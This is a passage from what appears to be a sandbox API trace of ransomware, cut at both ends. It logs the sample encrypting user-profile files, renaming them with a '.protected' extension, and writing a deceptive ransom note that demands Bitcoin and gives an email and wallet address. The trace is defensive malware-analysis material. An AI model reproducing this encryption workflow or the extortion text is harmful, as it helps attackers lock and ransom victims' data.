(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.354] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.354] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0095.354] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.354] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.354] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.354] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.355] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0095.355] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.355] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0095.355] StrStrW (lpFirst="desktop.ini", 
lpSrch=".rar") returned 0x0 [0095.355] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0095.355] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.355] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.356] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.356] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.356] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.356] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.356] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.356] CloseHandle (hObject=0xb4) returned 1 [0095.356] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.protected") returned 48 [0095.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.protected" (normalized: "c:\\users\\default\\music\\desktop.ini.protected")) returned 1 [0095.357] FindNextFileW (in: hFindFile=0x47b990, 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.357] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.357] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\RESTORE_FILES.txt") returned 44 [0095.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\music\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.358] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.358] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.358] lstrlenA (lpString="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") returned 684 [0095.358] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.358] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.359] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.359] CloseHandle (hObject=0xa4) returned 1 [0095.359] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="Windows") returned -1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="Program Files") returned -1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="Program Files (x86)") returned -1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="$Recycle.bin") returned 1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="System Volume Information") returned -1 [0095.359] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents") returned 33 [0095.359] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0095.359] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0095.359] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents\\*") returned 35 [0095.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.359] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="Windows") returned -1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="Program Files") returned -1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="Program Files (x86)") returned -1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="$Recycle.bin") returned 1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="System Volume Information") returned -1 [0095.359] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood") returned 28 [0095.359] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 
[0095.359] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0095.359] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood\\*") returned 30 [0095.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.360] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Windows") returned -1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Program Files") returned -1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Program Files (x86)") returned -1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="$Recycle.bin") returned 1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="System Volume Information") returned -1 [0095.360] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0095.360] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".protected") returned 0x0 [0095.360] lstrcmpW (lpString1="NTUSER.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0095.360] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.360] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.360] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0095.360] StrStrW (lpFirst="NTUSER.DAT", lpSrch=".txt") returned 0x0 [0095.360] 
lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0095.360] StrStrW (lpFirst="NTUSER.DAT", lpSrch=".rar") returned 0x0 [0095.360] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0095.360] StrStrW (lpFirst="NTUSER.DAT", lpSrch=".zip") returned 0x0 [0095.361] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.370] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.370] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.371] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.371] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.372] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.372] CloseHandle (hObject=0xa4) returned 1 [0095.372] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.protected") returned 41 [0095.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.protected" (normalized: "c:\\users\\default\\ntuser.dat.protected")) returned 
1 [0095.373] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="Windows") returned -1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="Program Files") returned -1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="Program Files (x86)") returned -1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="$Recycle.bin") returned 1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="System Volume Information") returned -1 [0095.373] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0095.373] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch=".protected") returned 0x0 [0095.373] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2="RESTORE_FILES.txt") returned -1 [0095.373] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.373] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.373] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0095.373] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch=".txt") returned 0x0 [0095.374] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0095.374] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch=".rar") returned 0x0 [0095.374] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0095.374] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch=".zip") returned 0x0 [0095.374] 
ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x400, lpOverlapped=0x0) returned 1 [0095.379] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffc00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.379] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x400, lpOverlapped=0x0) returned 1 [0095.379] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.379] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.379] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.379] CloseHandle (hObject=0xa4) returned 1 [0095.380] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.protected") returned 45 [0095.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.protected" (normalized: "c:\\users\\default\\ntuser.dat.log.protected")) returned 1 [0095.381] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Windows") returned -1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Program Files") 
returned -1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Program Files (x86)") returned -1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="$Recycle.bin") returned 1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="System Volume Information") returned -1 [0095.381] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0095.381] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".protected") returned 0x0 [0095.381] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="RESTORE_FILES.txt") returned -1 [0095.381] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.381] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.381] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0095.381] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".txt") returned 0x0 [0095.381] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0095.381] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".rar") returned 0x0 [0095.381] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0095.381] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".zip") returned 0x0 [0095.382] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.390] SetFilePointerEx (in: hFile=0xa4, 
liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.390] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.391] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.391] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.392] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.392] CloseHandle (hObject=0xa4) returned 1 [0095.392] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.protected") returned 46 [0095.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.protected" (normalized: "c:\\users\\default\\ntuser.dat.log1.protected")) returned 1 [0095.393] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Windows") returned -1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Program Files") returned -1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Program Files (x86)") returned -1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="$Recycle.bin") returned 1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", 
lpString2="System Volume Information") returned -1 [0095.393] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0095.393] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".protected") returned 0x0 [0095.393] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="RESTORE_FILES.txt") returned -1 [0095.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.394] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0095.394] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".txt") returned 0x0 [0095.394] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0095.394] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".rar") returned 0x0 [0095.394] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0095.394] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".zip") returned 0x0 [0095.394] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x0, lpOverlapped=0x0) returned 1 [0095.394] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.394] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x0, lpOverlapped=0x0) returned 1 [0095.394] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.395] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.395] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.395] CloseHandle (hObject=0xa4) returned 1 [0095.396] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.protected") returned 46 [0095.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.protected" (normalized: "c:\\users\\default\\ntuser.dat.log2.protected")) returned 1 [0095.397] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Windows") returned -1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Program Files") returned -1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Program Files (x86)") returned -1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="$Recycle.bin") returned 1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="System Volume Information") returned -1 [0095.397] wnsprintfW (in: 
